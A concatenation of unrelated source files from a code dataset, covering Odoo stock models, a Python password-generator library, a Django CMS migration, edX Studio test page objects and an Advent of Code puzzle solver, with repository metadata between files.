res[packlot.id] = (packlot.qty == 0.0)
else:
res[packlot.id] = (packlot.qty_todo == 0.0) or (packlot.qty < packlot.qty_todo)
return res
_columns = {
'operation_id': fields.many2one('stock.pack.operation'),
'qty': fields.float('Done'),
'lot_id': fields.many2one('stock.production.lot', 'Lot/Serial Number'),
'lot_name': fields.char('Lot Name'),
'qty_todo': fields.float('To Do'),
'plus_visible': fields.function(_get_plus, type='boolean'),
}
_defaults = {
'qty': lambda cr, uid, ids, c: 1.0,
'qty_todo': lambda cr, uid, ids, c: 0.0,
'plus_visible': True,
}
def _check_lot(self, cr, uid, ids, context=None):
for packlot in self.browse(cr, uid, ids, context=context):
if not packlot.lot_name and not packlot.lot_id:
return False
return True
_constraints = [
(_check_lot,
'Lot is required',
['lot_id', 'lot_name']),
]
_sql_constraints = [
('qty', 'CHECK(qty >= 0.0)','Quantity must be greater than or equal to 0.0!'),
('uniq_lot_id', 'unique(operation_id, lot_id)', 'You have already mentioned this lot in another line'),
('uniq_lot_name', 'unique(operation_id, lot_name)', 'You have already mentioned this lot name in another line')]
def do_plus(self, cr, uid, ids, context=None):
pack_obj = self.pool['stock.pack.operation']
for packlot in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [packlot.id], {'qty': packlot.qty + 1}, context=context)
pack = self.browse(cr, uid, ids[0], context=context).operation_id
qty_done = sum([x.qty for x in pack.pack_lot_ids])
pack_obj.write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return pack_obj.split_lot(cr, uid, [pack.id], context=context)
def do_minus(self, cr, uid, ids, context=None):
pack_obj = self.pool['stock.pack.operation']
for packlot in self.browse(cr, uid, ids, context=context):
self.write(cr, uid, [packlot.id], {'qty': packlot.qty - 1}, context=context)
pack = self.browse(cr, uid, ids[0], context=context).operation_id
qty_done = sum([x.qty for x in pack.pack_lot_ids])
pack_obj.write(cr, uid, [pack.id], {'qty_done': qty_done}, context=context)
return pack_obj.split_lot(cr, uid, [pack.id], context=context)
class stock_move_operation_link(osv.osv):
"""
Table making the link between stock.moves and stock.pack.operations to compute the remaining quantities on each of these objects
"""
_name = "stock.move.operation.link"
_description = "Link between stock moves and pack operations"
_columns = {
'qty': fields.float('Quantity', help="Quantity of products to consider when talking about the contribution of this pack operation towards the remaining quantity of the move (and inverse). Given in the product main uom."),
'operation_id': fields.many2one('stock.pack.operation', 'Operation', required=True, ondelete="cascade"),
'move_id': fields.many2one('stock.move', 'Move', required=True, ondelete="cascade"),
'reserved_quant_id': fields.many2one('stock.quant', 'Reserved Quant', help="Technical field containing the quant that created this link between an operation and a stock move. Used at the stock_move_obj.action_done() time to avoid seeking a matching quant again"),
}
class stock_warehouse_orderpoint(osv.osv):
"""
Defines Minimum stock rules.
"""
_name = "stock.warehouse.orderpoint"
_description = "Minimum Inventory Rule"
def subtract_procurements_from_orderpoints(self, cr, uid, orderpoint_ids, context=None):
'''This function returns quantity of product that needs to be deducted from the orderpoint computed quantity because there's already a procurement created with aim to fulfill it.
'''
cr.execute("""select op.id, p.id, p.product_uom, p.product_qty, pt.uom_id, sm.product_qty from procurement_order as p left join stock_move as sm ON sm.procurement_id = p.id,
stock_warehouse_orderpoint op, product_product pp, product_template pt
WHERE p.orderpoint_id = op.id AND p.state not in ('done', 'cancel') AND (sm.state IS NULL OR sm.state not in ('draft'))
AND pp.id = p.product_id AND pp.product_tmpl_id = pt.id
AND op.id IN %s
ORDER BY op.id, p.id
""", (tuple(orderpoint_ids),))
results = cr.fetchall()
current_proc = False
current_op = False
uom_obj = self.pool.get("product.uom")
op_qty = 0
res = dict.fromkeys(orderpoint_ids, 0.0)
for move_result in results:
op = move_result[0]
if current_op != op:
if current_op:
res[current_op] = op_qty
current_op = op
op_qty = 0
proc = move_result[1]
if proc != current_proc:
op_qty += uom_obj._compute_qty(cr, uid, move_result[2], move_result[3], move_result[4], round=False)
current_proc = proc
if move_result[5]: #If a move is associated (is move qty)
op_qty -= move_result[5]
if current_op:
res[current_op] = op_qty
return res
def _check_product_uom(self, cr, uid, ids, context=None):
'''
Check if the UoM has the same category as the product standard UoM
'''
if not context:
context = {}
for rule in self.browse(cr, uid, ids, context=context):
if rule.product_id.uom_id.category_id.id != rule.product_uom.category_id.id:
return False
return True
_columns = {
'name': fields.char('Name', required=True, copy=False),
'active': fields.boolean('Active', help="If the active field is set to False, it will allow you to hide the orderpoint without removing it."),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True, ondelete="cascade"),
'location_id': fields.many2one('stock.location', 'Location', required=True, ondelete="cascade"),
'product_id': fields.many2one('product.product', 'Product', required=True, ondelete='cascade', domain=[('type', '=', 'product')]),
'product_uom': fields.related('product_id', 'uom_id', type='many2one', relation='product.uom', string='Product Unit of Measure', readonly=True, required=True),
'product_min_qty': fields.float('Minimum Quantity', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="When the virtual stock goes below the Min Quantity specified for this field, Odoo generates "\
"a procurement to bring the forecasted quantity to the Max Quantity."),
'product_max_qty': fields.float('Maximum Quantity', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="When the virtual stock goes below the Min Quantity, Odoo generates "\
"a procurement to bring the forecasted quantity to the Quantity specified as Max Quantity."),
'qty_multiple': fields.float('Qty Multiple', required=True,
digits_compute=dp.get_precision('Product Unit of Measure'),
help="The procurement quantity will be rounded up to this multiple. If it is 0, the exact quantity will be used. "),
'procurement_ids': fields.one2many('procurement.order', 'orderpoint_id', 'Created Procurements'),
'group_id': fields.many2one('procurement.group', 'Procurement Group', help="Moves created through this orderpoint will be put in this procurement group. If none is given, the moves generated by procurement rules will be grouped into one big picking.", copy=False),
'company_id': fields.many2one('res.company', 'Company', required=True),
'lead_days': fields.integer('Lead Time', help="Number of days after the orderpoint is triggered to receive the products or to order to the vendor"),
'lead_type': fields.selection([
('net', 'Day(s) to get the products'),
('supplier', 'Day(s) to purchase')
], 'Lead Type', required=True)
}
_defaults = {
'active': lambda *a: 1,
'lead_days': lambda *a: 1,
'lead_type': lambda *a: 'supplier',
'qty_multiple': lambda *a: 1,
'name': lambda self, cr, uid, context: self.pool.get('ir.sequence').next_by_code(cr, uid, 'stock.orderpoint') or '',
'product_uom': lambda self, cr, uid, context: context.get('product_uom', False),
'company_id': lambda self, cr, uid, context: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.warehouse.orderpoint', context=context)
}
_sql_constraints = [
('qty_multiple_check', 'CHECK( qty_multiple >= 0 )', 'Qty Multiple must be greater than or equal to zero.'),
]
_constraints = [
(_check_product_uom, 'You have to select a product unit of measure in the same category than the default unit of measure of the product', ['product_id', 'product_uom']),
]
def default_get(self, cr, uid, fields, context=None):
warehouse_obj = self.pool.get('stock.warehouse')
res = super(stock_warehouse_orderpoint, self).default_get(cr, uid, fields, context)
# default 'warehouse_id' and 'location_id'
if 'warehouse_id' not in res:
warehouse_ids = res.get('company_id') and warehouse_obj.search(cr, uid, [('company_id', '=', res['company_id'])], limit=1, context=context) or []
res['warehouse_id'] = warehouse_ids and warehouse_ids[0] or False
if 'location_id' not in res:
res['location_id'] = res.get('warehouse_id') and warehouse_obj.browse(cr, uid, res['warehouse_id'], context).lot_stock_id.id or False
return res
def onchange_warehouse_id(self, cr, uid, ids, warehouse_id, context=None):
""" Finds location id for changed warehouse.
@param warehouse_id: Changed id of warehouse.
@return: Dictionary of values.
"""
if warehouse_id:
w = self.pool.get('stock.warehouse').browse(cr, uid, warehouse_id, context=context)
v = {'location_id': w.lot_stock_id.id}
return {'value': v}
return {}
def onchange_product_id(self, cr, uid, ids, product_id, context=None):
""" Finds UoM for changed product.
@param product_id: Changed id of product.
@return: Dictionary of values.
"""
if product_id:
prod = self.pool.get('product.product').browse(cr, uid, product_id, context=context)
d = {'product_uom': [('category_id', '=', prod.uom_id.category_id.id)]}
v = {'product_uom': prod.uom_id.id}
return {'value': v, 'domain': d}
return {'domain': {'product_uom': []}}
class stock_picking_type(osv.osv):
_name = "stock.picking.type"
_description = "The picking type determines the picking view"
_order = 'sequence'
def open_barcode_interface(self, cr, uid, ids, context=None):
final_url = "/stock/barcode/#action=stock.ui&picking_type_id=" + str(ids[0]) if len(ids) else '0'
return {'type': 'ir.actions.act_url', 'url': final_url, 'target': 'self'}
def _get_tristate_values(self, cr, uid, ids, field_name, arg, context=None):
picking_obj = self.pool.get('stock.picking')
res = {}
for picking_type_id in ids:
#get last 10 pickings of this type
picking_ids = picking_obj.search(cr, uid, [('picking_type_id', '=', picking_type_id), ('state', '=', 'done')], order='date_done desc', limit=10, context=context)
tristates = []
for picking in picking_obj.browse(cr, uid, picking_ids, context=context):
if picking.date_done > picking.date:
tristates.insert(0, {'tooltip': picking.name or '' + ": " + _('Late'), 'value': -1})
elif picking.backorder_id:
tristates.insert(0, {'tooltip': picking.name or '' + ": " + _('Backorder exists'), 'value': 0})
else:
tristates.insert(0, {'tooltip': picking.name or '' + ": " + _('OK'), 'value': 1})
res[picking_type_id] = json.dumps(tristates)
return res
def _get_picking_count(self, cr, uid, ids, field_names, arg, context=None):
obj = self.pool.get('stock.picking')
domains = {
'count_picking_draft': [('state', '=', 'draft')],
'count_picking_waiting': [('state', 'in', ('confirmed', 'waiting'))],
'count_picking_ready': [('state', 'in', ('assigned', 'partially_available'))],
'count_picking': [('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available'))],
'count_picking_late': [('min_date', '<', time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)), ('state', 'in', ('assigned', 'waiting', 'confirmed', 'partially_available'))],
'count_picking_backorders': [('backorder_id', '!=', False), ('state', 'in', ('confirmed', 'assigned', 'waiting', 'partially_available'))],
}
result = {}
for field in domains:
data = obj.read_group(cr, uid, domains[field] +
[('state', 'not in', ('done', 'cancel')), ('picking_type_id', 'in', ids)],
['picking_type_id'], ['picking_type_id'], context=context)
count = dict(map(lambda x: (x['picking_type_id'] and x['picking_type_id'][0], x['picking_type_id_count']), data))
for tid in ids:
result.setdefault(tid, {})[field] = count.get(tid, 0)
for tid in ids:
if result[tid]['count_picking']:
result[tid]['rate_picking_late'] = result[tid]['count_picking_late'] * 100 / result[tid]['count_picking']
result[tid]['rate_picking_backorders'] = result[tid]['count_picking_backorders'] * 100 / result[tid]['count_picking']
else:
result[tid]['rate_picking_late'] = 0
result[tid]['rate_picking_backorders'] = 0
return result
def _get_action(self, cr, uid, ids, action, context=None):
mod_obj = self.pool.get('ir.model.data')
act_obj = self.pool.get('ir.actions.act_window')
result = mod_obj.xmlid_to_res_id(cr, uid, action, raise_if_not_found=True)
result = act_obj.read(cr, uid, [result], context=context)[0]
if ids:
picking_type = self.browse(cr, uid, ids[0], context=context)
result['display_name'] = picking_type.display_name
return result
def get_action_picking_tree_late(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_late', context=context)
def get_action_picking_tree_backorder(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_backorder', context=context)
def get_action_picking_tree_waiting(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_waiting', context=context)
def get_action_picking_tree_ready(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.action_picking_tree_ready', context=context)
def get_stock_picking_action_picking_type(self, cr, uid, ids, context=None):
return self._get_action(cr, uid, ids, 'stock.stock_picking_action_picking_type', context=context)
def onchange_picking_code(self, cr, uid, ids, picking_code=False):
if not picking_code:
return False
obj_data = self.pool.get('ir.model.data')
stock_loc = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_stock')
result = {
'default_location_src_id': stock_loc,
'default_location_dest_id': stock_loc,
}
if picking_code == 'incoming':
result['default_location_src_id'] = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_suppliers')
elif picking_code == 'outgoing':
result['default_location_dest_id'] = obj_data.xmlid_to_res_id(cr, uid, 'stock.stock_location_customers')
return {'value': result}
def _get_name(self, cr, uid, ids, field_names, arg, context=None):
return dict(self.name_get(cr, uid, ids, context=context))
def name_get(self, cr, uid, ids, context=None):
"""Overides orm name_get method to display 'Warehouse_name: PickingType_name' """
if context is None:
context = {}
if not isinstance(ids, list):
ids = [ids]
res = []
if not ids:
return res
for record in self.browse(cr, uid, ids, context=context):
name = record.name
if record.warehouse_id:
name = record.warehouse_id.name + ': ' +name
res.append((record.id, name))
return res
@api.model
def name_search(self, name, args=None, operator='ilike', limit=100):
args = args or []
domain = []
if name:
domain = ['|', ('name', operator, name), ('warehouse_id.name', operator, name)]
picks = self.search(domain + args, limit=limit)
return picks.name_get()
def _default_warehouse(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context)
res = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', user.company_id.id)], limit=1, context=context)
return res and res[0] or False
_columns = {
'name': fields.char('Picking Type Name', translate=True, required=True),
'complete_name': fields.function(_get_name, type='char', string='Name'),
'color': fields.integer('Color'),
'sequence': fields.integer('Sequence', help="Used to order the 'All Operations' kanban view"),
'sequence_id': fields.many2one('ir.sequence', 'Reference Sequence', required=True),
'default_location_src_id': fields.many2one('stock.location', 'Default Source Location', help="This is the default source location when you create a picking manually with this picking type. It is possible however to change it or that the routes put another location. If it is empty, it will check for the supplier location on the partner. "),
'default_location_dest_id': fields.many2one('stock.location', 'Default Destination Location', help="This is the default destination location when you create a picking manually with this picking type. It is possible however to change it or that the routes put another location. If it is empty, it will check for the customer location on the partner. "),
'code': fields.selection([('incoming', 'Suppliers'), ('outgoing', 'Customers'), ('internal', 'Internal')], 'Type of Operation', required=True),
'return_picking_type_id': fields.many2one('stock.picking.type', 'Picking Type for Returns'),
'show_entire_packs': fields.boolean('Allow moving packs', help="If checked, this shows the packs to be moved as a whole in the Operations tab all the time, even if there was no entire pack reserved."),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', ondelete='cascade'),
'active': fields.boolean('Active'),
'use_create_lots': fields.boolean('Create New Lots', help="If this is checked only, it will suppose you want to create new Serial Numbers / Lots, so you can provide them in a text field. "),
'use_existing_lots': fields.boolean('Use Existing Lots', help="If this is checked, you will be able to choose the Serial Number / Lots. You can also decide to not put lots in this picking type. This means it will create stock with no lot or not put a restriction on the lot taken. "),
# Statistics for the kanban view
'last_done_picking': fields.function(_get_tristate_values,
type='char',
string='Last 10 Done Pickings'),
'count_picking_draft': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_ready': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_waiting': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_late': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'count_picking_backorders': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'rate_picking_late': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
'rate_picking_backorders': fields.function(_get_picking_count,
type='integer', multi='_get_picking_count'),
# Barcode nomenclature
'barcode_nomenclature_id': fields.many2one('barcode.nomenclature','Barcode Nomenclature', help='A barcode nomenclature'),
}
_defaults = {
'warehouse_id': _default_warehouse,
'active': True,
'use_existing_lots': True,
'use_create_lots': True,
}
class barcode_rule(models.Model):
_inherit = 'barcode.rule'
def _get_type_selection(self):
types = sets.Set(super(barcode_rule,self)._get_type_selection())
types.update([
('weight', _('Weighted Product')),
('location', _('Location')),
('lot', _('Lot')),
('package', _('Package'))
])
return list(types)
class StockPackOperation(models.Model):
_inherit = 'stock.pack.operation'
@api.onchange('pack_lot_ids')
def _onchange_packlots(self):
self.qty_done = sum([x.qty for x in self.pack_lot_ids])
|
agpl-3.0
| -7,653,917,894,173,250,000
| 58.807486
| 420
| 0.595567
| false
| 3.864032
| false
| false
| false
|
TheDSCPL/SSRE_2017-2018_group8
|
Projeto/Python/cryptopy/crypto/passwords/passwordfactory.py
|
1
|
3751
|
# -*- coding: utf-8 -*-
""" crypto.passwords.passwordfactory
Python classes to create and recover passwords. Currently contains
simple password generation. <need to merge the dictionary based pws>
Copyright © (c) 2002 by Paul A. Lambert
Read LICENSE.txt for license information.
August 14, 2002
"""
from random import Random
from sha import sha # the SHA1 algorithm for cryptographic hashing
from math import log, ceil
#from binascii_plus import b2a_p
class PasswordFactory:
""" Make passwords using pseudo random seeds.
Also used to recover passwords by using same pwSeed.
If the seed is not saved, the password can not be recovered!!
"""
def __init__(self, pwFactorySeed, minSize=10, maxSize=10 ):
""" An abstract class to create passwords """
self._factorySeed = pwFactorySeed
self.minSize = minSize
self.maxSize = maxSize
self.rand = Random( self._factorySeed )
def getPassword(self, pwSeed):
raise "MUST be overloaded"
def __call__(self, pwSeed):
""" Create a new password as a 'call' """
return self.getPassword(pwSeed)
def entropy(self):
""" Calculate the security of the password generation as a power of 2 """
total = 0
for pwSize in range(self.minSize, self.maxSize+1):
total = total + self.passwordsForSize(pwSize)
return powof2( total )
def powof2(x):
""" Convert x to a power of 2 """
return log(x)/log(2)
class PasswordFactorySimple(PasswordFactory):
""" This class implements a very secure but simple selection of numbers and letters.
Some characters have been removed to prevent confusion between similar shapes
The removed characters are: (O,0,o), (l,1,I) , (u,v),(U,V)
"""
def __init__(self, pwFactorySeed, minSize=10, maxSize=10 ):
""" Initialize password generation """
PasswordFactory.__init__(self, pwFactorySeed, minSize, maxSize )
self.lettersReduced = 'abcdefghijkmnpqrstwxyzABCDEFGHJKLMNPQRSTWXYZ'
self.digitsReduced = '23456789'
self.specialCharacters = '#%*+$'
def getPassword(self, pwSeed):
""" Create a new password from pwSeed. """
self.rand.seed( pwSeed + 'getPassword' + self._factorySeed ) # reset prf sequence
self.passwordSize = self.rand.randrange(self.minSize, self.maxSize+1)
password = ''
for i in range(self.passwordSize):
password = password + self.rand.choice(self.lettersReduced+self.digitsReduced)
return password
def passwordsForSize(self,pwSize):
return (len(self.lettersReduced)+len(self.digitsReduced))**pwSize
consonants_01 = 'bcdfghjklmnpqrstvwxz'
vowels_01 = 'aeiouy'
class PasswordFactoryReadable_01(PasswordFactory):
""" Readable passwords created by alternating consonate/vowel/consonate ... etc.
"""
def getPassword(self, pwSeed):
""" Create a new password. Also used to recover passwords by using same pwSeed """
#self.rand.seed( 'getPassword'+self.__factorySeed+pwSeed ) # reset prf sequence
self.passwordSize = self.rand.randrange(self.minSize, self.maxSize+1)
password = ''
for i in range(self.passwordSize):
if i == 0 :
password = password + self.rand.choice(consonants_01)
else:
if password[-1] in consonants_01 :
password = password + self.rand.choice(vowels_01)
else:
password = password + self.rand.choice(consonants_01)
return password
def passwordsForSize(self,pwSize):
return (len(vowels_01)**(pwSize/2))*(len(consonants_01)**ceil(pwSize/2))
|
mit
| -202,067,140,215,519,550
| 38.484211
| 94
| 0.647561
| false
| 3.935992
| false
| false
| false
|
mitodl/bootcamp-ecommerce
|
cms/migrations/0025_add_resource_pages_settings.py
|
1
|
2756
|
# Generated by Django 2.2.13 on 2020-06-29 18:27
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("wagtailcore", "0045_assign_unlock_grouppagepermission"),
("cms", "0024_lettertemplatepage"),
]
operations = [
migrations.CreateModel(
name="ResourcePagesSettings",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"about_us_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"apply_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"bootcamps_programs_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"privacy_policy_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
(
"site",
models.OneToOneField(
editable=False,
on_delete=django.db.models.deletion.CASCADE,
to="wagtailcore.Site",
),
),
(
"terms_of_service_page",
models.ForeignKey(
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="+",
to="wagtailcore.Page",
),
),
],
options={"verbose_name": "Resource Pages"},
)
]
|
bsd-3-clause
| -725,346,538,183,442,300
| 32.204819
| 69
| 0.359216
| false
| 5.85138
| false
| false
| false
|
nttks/edx-platform
|
common/test/acceptance/pages/studio/library.py
|
1
|
11569
|
"""
Library edit page in Studio
"""
from bok_choy.javascript import js_defined, wait_for_js
from bok_choy.page_object import PageObject
from bok_choy.promise import EmptyPromise
from selenium.webdriver.support.select import Select
from .component_editor import ComponentEditorView
from .container import XBlockWrapper
from ...pages.studio.users import UsersPageMixin
from ...pages.studio.pagination import PaginatedMixin
from selenium.webdriver.common.keys import Keys
from ..common.utils import confirm_prompt, wait_for_notification
from . import BASE_URL
class LibraryPage(PageObject):
"""
Base page for Library pages. Defaults URL to the edit page.
"""
def __init__(self, browser, locator, course_locator):
super(LibraryPage, self).__init__(browser)
self.locator = locator
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library edit page for the given library.
"""
return "{}/course/{}/library/{}".format(BASE_URL, unicode(self.course_locator), unicode(self.locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library edit page.
"""
return self.q(css='body.view-library').present
class LibraryEditPage(LibraryPage, PaginatedMixin, UsersPageMixin):
"""
Library edit page in Studio
"""
def get_header_title(self):
"""
The text of the main heading (H1) visible on the page.
"""
return self.q(css='h1.page-header-title').text
def wait_until_ready(self):
"""
When the page first loads, there is a loading indicator and most
functionality is not yet available. This waits for that loading to
finish.
Always call this before using the page. It also disables animations
for improved test reliability.
"""
self.wait_for_ajax()
super(LibraryEditPage, self).wait_until_ready()
@property
def xblocks(self):
"""
Return a list of xblocks loaded on the container page.
"""
return self._get_xblocks()
def are_previews_showing(self):
"""
Determines whether or not previews are showing for XBlocks
"""
return all([not xblock.is_placeholder() for xblock in self.xblocks])
def toggle_previews(self):
"""
Clicks the preview toggling button and waits for the previews to appear or disappear.
"""
toggle = not self.are_previews_showing()
self.q(css='.toggle-preview-button').click()
EmptyPromise(
lambda: self.are_previews_showing() == toggle,
'Preview is visible: %s' % toggle,
timeout=30
).fulfill()
self.wait_until_ready()
def click_duplicate_button(self, xblock_id):
"""
Click on the duplicate button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "duplicate").click()
wait_for_notification(self)
self.wait_for_ajax()
def click_delete_button(self, xblock_id, confirm=True):
"""
Click on the delete button for the given XBlock
"""
self._action_btn_for_xblock_id(xblock_id, "delete").click()
if confirm:
confirm_prompt(self) # this will also wait_for_notification()
self.wait_for_ajax()
def _get_xblocks(self):
"""
Create an XBlockWrapper for each XBlock div found on the page.
"""
prefix = '.wrapper-xblock.level-page '
return self.q(css=prefix + XBlockWrapper.BODY_SELECTOR).map(
lambda el: XBlockWrapper(self.browser, el.get_attribute('data-locator'))
).results
def _div_for_xblock_id(self, xblock_id):
"""
Given an XBlock's usage locator as a string, return the WebElement for
that block's wrapper div.
"""
return self.q(css='.wrapper-xblock.level-page .studio-xblock-wrapper').filter(
lambda el: el.get_attribute('data-locator') == xblock_id
)
def _action_btn_for_xblock_id(self, xblock_id, action):
"""
Given an XBlock's usage locator as a string, return one of its action
buttons.
action is 'edit', 'duplicate', or 'delete'
"""
return self._div_for_xblock_id(xblock_id)[0].find_element_by_css_selector(
'.header-actions .{action}-button.action-button'.format(action=action)
)
class StudioLibraryContentEditor(ComponentEditorView):
"""
Library Content XBlock Modal edit window
"""
# Labels used to identify the fields on the edit modal:
LIBRARY_LABEL = "Library"
COUNT_LABEL = "Count"
SCORED_LABEL = "Scored"
PROBLEM_TYPE_LABEL = "Problem Type"
@property
def library_name(self):
""" Gets name of library """
return self.get_selected_option_text(self.LIBRARY_LABEL)
@library_name.setter
def library_name(self, library_name):
"""
Select a library from the library select box
"""
self.set_select_value(self.LIBRARY_LABEL, library_name)
EmptyPromise(lambda: self.library_name == library_name, "library_name is updated in modal.").fulfill()
@property
def count(self):
"""
Gets value of children count input
"""
return int(self.get_setting_element(self.COUNT_LABEL).get_attribute('value'))
@count.setter
def count(self, count):
"""
Sets value of children count input
"""
count_text = self.get_setting_element(self.COUNT_LABEL)
count_text.send_keys(Keys.CONTROL, "a")
count_text.send_keys(Keys.BACK_SPACE)
count_text.send_keys(count)
EmptyPromise(lambda: self.count == count, "count is updated in modal.").fulfill()
@property
def scored(self):
"""
Gets value of scored select
"""
value = self.get_selected_option_text(self.SCORED_LABEL)
if value == 'True':
return True
elif value == 'False':
return False
raise ValueError("Unknown value {value} set for {label}".format(value=value, label=self.SCORED_LABEL))
@scored.setter
def scored(self, scored):
"""
Sets value of scored select
"""
self.set_select_value(self.SCORED_LABEL, str(scored))
EmptyPromise(lambda: self.scored == scored, "scored is updated in modal.").fulfill()
@property
def capa_type(self):
"""
Gets value of CAPA type select
"""
return self.get_setting_element(self.PROBLEM_TYPE_LABEL).get_attribute('value')
@capa_type.setter
def capa_type(self, value):
"""
Sets value of CAPA type select
"""
self.set_select_value(self.PROBLEM_TYPE_LABEL, value)
EmptyPromise(lambda: self.capa_type == value, "problem type is updated in modal.").fulfill()
def set_select_value(self, label, value):
"""
Sets the select with given label (display name) to the specified value
"""
elem = self.get_setting_element(label)
select = Select(elem)
select.select_by_value(value)
@js_defined('window.LibraryContentAuthorView')
class StudioLibraryContainerXBlockWrapper(XBlockWrapper):
"""
Wraps :class:`.container.XBlockWrapper` for use with LibraryContent blocks
"""
url = None
def is_browser_on_page(self):
"""
Returns true iff the library content area has been loaded
"""
return self.q(css='article.content-primary').visible
def is_finished_loading(self):
"""
Returns true iff the Loading indicator is not visible
"""
return not self.q(css='div.ui-loading').visible
@classmethod
def from_xblock_wrapper(cls, xblock_wrapper):
"""
Factory method: creates :class:`.StudioLibraryContainerXBlockWrapper` from :class:`.container.XBlockWrapper`
"""
return cls(xblock_wrapper.browser, xblock_wrapper.locator)
def get_body_paragraphs(self):
"""
Gets library content body paragraphs
"""
return self.q(css=self._bounded_selector(".xblock-message-area p"))
@wait_for_js # Wait for the fragment.initialize_js('LibraryContentAuthorView') call to finish
def refresh_children(self):
"""
Click "Update now..." button
"""
btn_selector = self._bounded_selector(".library-update-btn")
self.wait_for_element_presence(btn_selector, 'Update now button is present.')
self.q(css=btn_selector).first.click()
# This causes a reload (see cms/static/xmodule_js/public/js/library_content_edit.js)
# Check that the ajax request that caused the reload is done.
# TODO self.wait_for_ajax()
# Then check that we are still on the right page.
self.wait_for(lambda: self.is_browser_on_page(), 'StudioLibraryContainerXBlockWrapper has reloaded.')
# Wait longer than the default 60 seconds, because this was intermittently failing on jenkins
# with the screenshot showing that the Loading indicator was still visible. See TE-745.
self.wait_for(lambda: self.is_finished_loading(), 'Loading indicator is not visible.', timeout=120)
# And wait to make sure the ajax post has finished.
self.wait_for_ajax()
self.wait_for_element_absence(btn_selector, 'Wait for the XBlock to finish reloading')
class LibraryHomePage(PageObject):
"""
Base page for Library pages. Defaults URL to the home page.
"""
def __init__(self, browser, course_locator):
super(LibraryHomePage, self).__init__(browser)
self.course_locator = course_locator
@property
def url(self):
"""
URL to the library home page for the given library.
"""
return "{}/course/{}/libhome/".format(BASE_URL, unicode(self.course_locator))
def is_browser_on_page(self):
"""
Returns True iff the browser has loaded the library home page.
"""
return self.q(css='.libraries').present
def has_new_library_button(self):
"""
(bool) is the "New Library" button present?
"""
return self.q(css='.new-library-button').present
def click_new_library(self):
"""
Click on the "New Library" button
"""
self.q(css='.new-library-button').first.click()
self.wait_for_ajax()
def is_new_library_form_visible(self):
"""
Is the new library form visisble?
"""
return self.q(css='.wrapper-create-library').visible
def fill_new_library_form(self, display_name, number):
"""
Fill out the form to create a new library.
Must have called click_new_library() first.
"""
field = lambda fn: self.q(css='.wrapper-create-library #new-library-{}'.format(fn))
field('name').fill(display_name)
field('number').fill(number)
def is_new_library_form_valid(self):
"""
IS the new library form ready to submit?
"""
return (
self.q(css='.wrapper-create-library .new-library-save:not(.is-disabled)').present and
not self.q(css='.wrapper-create-library .wrap-error.is-shown').present
)
def submit_new_library_form(self):
"""
Submit the new library form.
"""
self.q(css='.wrapper-create-library .new-library-save').click()
|
agpl-3.0
| 3,979,192,120,614,835,000
| 33.126844
| 116
| 0.622007
| false
| 4.039455
| false
| false
| false
|
tmct/adventOfCode2016
|
problems/21/Solver.py
|
1
|
4493
|
import re
swap_positions_regex = r'swap position (\d+) with position (\d+)'
swap_letters_regex = r'swap letter (.) with letter (.)'
rotate_regex = r'rotate (left|right) (\d+)'
rotate_on_letter_position_regex = r'rotate based on position of letter (.)'
reverse_slice_regex = r'reverse positions (\d+) through (\d+)'
move_regex = r'move position (\d+) to position (\d+)'
class Solver:
def __init__(self, start_string, decrypt = False):
self.buffer = list(start_string)
self.instructions = []
self.decrypt = decrypt
self.reverse_shift = {int(i): int(j) for i, j in zip('13572460', '76542107')}
def solve(self, input_file_name):
intermediates = [''.join(self.buffer)]
with open(input_file_name, 'r') as input_file:
for line in input_file:
self.add_instruction(line.strip())
if self.decrypt:
self.instructions = self.instructions[::-1]
for instruction in self.instructions:
instruction()
# intermediates.append(''.join(self.buffer))
# if not self.decrypt:
# intermediates = intermediates[::-1]
# for i in intermediates:
# print(i)
return ''.join(self.buffer)
def add_instruction(self, instruction_string):
match = re.search(swap_positions_regex, instruction_string)
if match:
return self.add_swap_positions_instruction(match)
match = re.search(swap_letters_regex, instruction_string)
if match:
return self.add_swap_letters_instruction(match)
match = re.search(rotate_regex, instruction_string)
if match:
return self.add_rotate_instruction(match)
match = re.search(rotate_on_letter_position_regex, instruction_string)
if match:
return self.add_rotate_on_letter_position_instruction(match)
